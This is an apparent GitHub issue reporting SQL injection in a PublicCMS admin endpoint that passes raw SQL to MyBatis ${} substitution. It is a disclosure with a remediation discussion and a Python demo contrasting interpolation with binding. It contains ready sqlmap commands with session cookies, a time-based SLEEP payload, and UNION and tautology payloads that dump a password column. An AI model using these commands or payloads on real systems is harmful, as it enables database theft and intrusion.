
There is a SQL Injection vulnerability that can dump the database #29

Closed
x00er opened this issue Jan 6, 2020 · 3 comments

x00er commented Jan 6, 2020

Where the SQL injection vulnerability appears in the code:
com.publiccms.controller.admin.sys.SysSiteAdminController

```java
@RequestMapping("execSql")
@Csrf
public String execSql(@RequestAttribute SysSite site, @SessionAttribute SysUser admin, String sql, HttpServletRequest request,
        ModelMap model) {
    // Only an admin of the master site may reach this; anyone else gets a "noright" error page
    if (ControllerUtils.verifyCustom("noright", !siteComponent.isMaster(site.getId()), model)) {
        return CommonConstants.TEMPLATE_ERROR;
    }
    if (-1 < sql.indexOf(CommonConstants.BLANK_SPACE)) {
        // Dispatch on the first word only; the statement text itself is passed through untouched
        String type = sql.substring(0, sql.indexOf(CommonConstants.BLANK_SPACE));
        try {
            if ("update".equalsIgnoreCase(type)) {
                model.addAttribute("result", sqlService.update(sql));
            } else if ("insert".equalsIgnoreCase(type)) {
                model.addAttribute("result", sqlService.insert(sql));
            } else if ("delete".equalsIgnoreCase(type)) {
                model.addAttribute("result", sqlService.delete(sql));
            } else {
                // Any other leading word goes to select() and the rows are returned as JSON
                model.addAttribute("result", JsonUtils.getString(sqlService.select(sql)));
            }
        } catch (Exception e) {
            // Database errors are echoed back to the caller
            model.addAttribute("error", e.getMessage());
        }
        model.addAttribute("sql", sql);
        // Every executed statement is written to the operation log
        logOperateService.save(new LogOperate(site.getId(), admin.getId(), LogLoginService.CHANNEL_WEB_MANAGER,
                "execsql.site", RequestUtils.getIpAddress(request), CommonUtils.getDate(), JsonUtils.getString(model)));
    }
    return CommonConstants.TEMPLATE_DONE;
}
```

sqlService.update(sql) => SqlMapper.xml:

```xml
<mapper namespace="com.publiccms.logic.mapper.tools.SqlMapper">
    <!-- ${sql} is substituted verbatim into the statement text; nothing is bound as a parameter -->
    <select id="select" parameterType="String" resultType="map">${sql}</select>
    <select id="query" parameterType="String" resultType="map">${sql}</select>
    <insert id="insert" parameterType="String">${sql}</insert>
    <update id="update" parameterType="String">${sql}</update>
    <delete id="delete" parameterType="String">${sql}</delete>
</mapper>
```

URL: http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql
POST data: `_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221`
The `sql` parameter is not filtered and is user-controllable.
We can use sqlmap to test the vulnerability:

```
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "PUBLICCMS_ADMIN=1_353b342a-075c-4a71-9f13-c20e5b30b603; JSESSIONID=BBA83A42D2455445CFE0A504F287C9DB; Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=111221" --level 3 --dbms mysql
```

```
sqlmap identified the following injection point(s) with a total of 751 HTTP(s) requests:

Parameter: sql (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: _csrf=353b342a-075c-4a71-9f13-c20e5b30b603&sql=(SELECT * FROM (SELECT(SLEEP(5)))CKuT)

[20:45:23] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0.12
```

View the tables in the PublicCMS database:

```
python sqlmap.py -u http://localhost:8080/publiccms/admin/sysSite/execSql.do?navTabId=sysSite/sql --cookie "JSESSIONID=70640223FE44003BC029AAAB54D24BC8; PUBLICCMS_ADMIN=1_2df43cfb-9546-4cdb-8150-6482f1b028de;Hm_lvt_4674b425370d9f190347b297042ae0b1=1552053320" --data "_csrf=2df43cfb-9546-4cdb-8150-6482f1b028de&sql=111" --level 5 -D publiccms --tables
```

[image: sqlmap table listing]

How to fix:

`${}` (unsafe form)
A parameter passed in the form `${foo}` takes part directly in SQL compilation, with the same effect as string concatenation, so a SQL injection vulnerability exists.

`#{}`
When `#{}` is used for parameter binding, MyBatis precompiles the SQL statement, which avoids SQL injection.
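As an added example (not code from this issue or from PublicCMS), the two MyBatis forms described above can be reproduced with Python's built-in `sqlite3` driver: string interpolation stands in for `${}` and a bound `?` placeholder for `#{}`. The `sys_user` table, its rows and the payloads are constructed for the example. The last function shows what happens when an entire statement is bound as one parameter, which is what `<select>#{sql}</select>` would amount to.

```python
import sqlite3

# Constructed sample schema and rows for the example (not PublicCMS data).
SAMPLE_ROWS = [("admin", "hash-of-admin-pw"), ("editor", "hash-of-editor-pw")]


def build_db() -> sqlite3.Connection:
    """In-memory database standing in for the CMS's MySQL instance."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sys_user (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    con.executemany("INSERT INTO sys_user (name, password) VALUES (?, ?)", SAMPLE_ROWS)
    con.commit()
    return con


def select_user_interpolated(con: sqlite3.Connection, name: str) -> list:
    """${name} style: the value is spliced into the statement text, so a quote
    inside it ends the literal and the rest is parsed as SQL."""
    sql = f"SELECT id, name FROM sys_user WHERE name = '{name}'"
    return con.execute(sql).fetchall()


def select_user_bound(con: sqlite3.Connection, name: str) -> list:
    """#{name} style: the statement is fixed and the value travels separately
    as a bound parameter, so it is compared as data and never parsed as SQL."""
    return con.execute("SELECT id, name FROM sys_user WHERE name = ?", (name,)).fetchall()


def exec_sql_bound(con: sqlite3.Connection, sql: str) -> list:
    """What <select>#{sql}</select> amounts to: the whole statement becomes a
    single bound parameter, i.e. a string literal that is returned, not run."""
    return con.execute("SELECT ?", (sql,)).fetchall()


if __name__ == "__main__":
    con = build_db()
    # Constructed payloads: a quote-break tautology and a UNION that reads the password column.
    bypass = "x' OR '1'='1"
    dump = "x' UNION SELECT id, password FROM sys_user --"
    print("interpolated, benign:    ", select_user_interpolated(con, "admin"))
    print("interpolated, OR payload:", select_user_interpolated(con, bypass))
    print("interpolated, UNION dump:", select_user_interpolated(con, dump))
    print("bound, OR payload:       ", select_user_bound(con, bypass))
    print("bound, UNION dump:       ", select_user_bound(con, dump))
    print("whole statement bound:   ", exec_sql_bound(con, "SELECT * FROM sys_user"))
```

With interpolation the tautology returns every row and the UNION returns the password column; with binding both payloads are just names that match nothing. Binding the entire statement makes it a string literal instead of executable SQL, so `#{}` protects values inside a fixed statement but cannot simply replace `${sql}` in a mapper whose whole statement text comes from the caller.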

sanluan (Owner) commented Jan 6, 2020

This is a database maintenance function for super administrators

x00er (Author) commented Jan 7, 2020

> This is a database maintenance function for super administrators

This is not a common SQL query. It has a SQL injection vulnerability, which may not only cause information disclosure but also allow the server to be remotely controlled and a backdoor to be installed.

sanluan (Owner) commented Apr 1, 2020

Fixed.
